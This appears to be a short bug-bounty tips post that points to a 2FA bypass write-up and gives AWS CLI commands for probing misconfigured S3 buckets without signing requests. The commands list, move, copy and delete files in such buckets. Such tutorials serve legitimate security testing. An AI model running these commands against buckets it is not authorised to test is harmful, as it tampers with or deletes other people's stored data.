Day 26 comes with different a pretty good resource to bypass 2FA and part 2 on S3 buckets misconfigurations!
2FA Bypass Resource
From Rajesh Ranjan. I have shared a link of a writeup in which researcher has shared some different techniques to Bypass the 2FA .
S3 Misconfiguration Part 2
From Sam (CoffeeJunkie). As we talked about in part 1, once you have the AWS KEYS, you can configure the keys in your terminal with the following command.
Once you type the command, it will start asking you for your
Access Key ID and AWS Secret Access Key. In order to check for vulnerable S3 buckets once you have the endpoints, you can type the following command.
aws s3 ls s3://[s3-bucket-link] --no-sign-request
After you’re on track, there are couple commands that you can try to read files or move files.
# Read files aws s3 ls s3://[s3-bucket-link] --no-sign-request # Move file aws s3 mv yourfile s3://[s3-bucket-link]/test-file.txt --no-sign-request # Copy files aws s3 cp test.svg s3://[s3-bucket-link]/test.svg --no-sign-request # Delete files aws s3 rm s3://[s3-bucket-link]/test.svg --no-sign-request
And that’s it! I hope you find a legal and vulnerable target to try this out.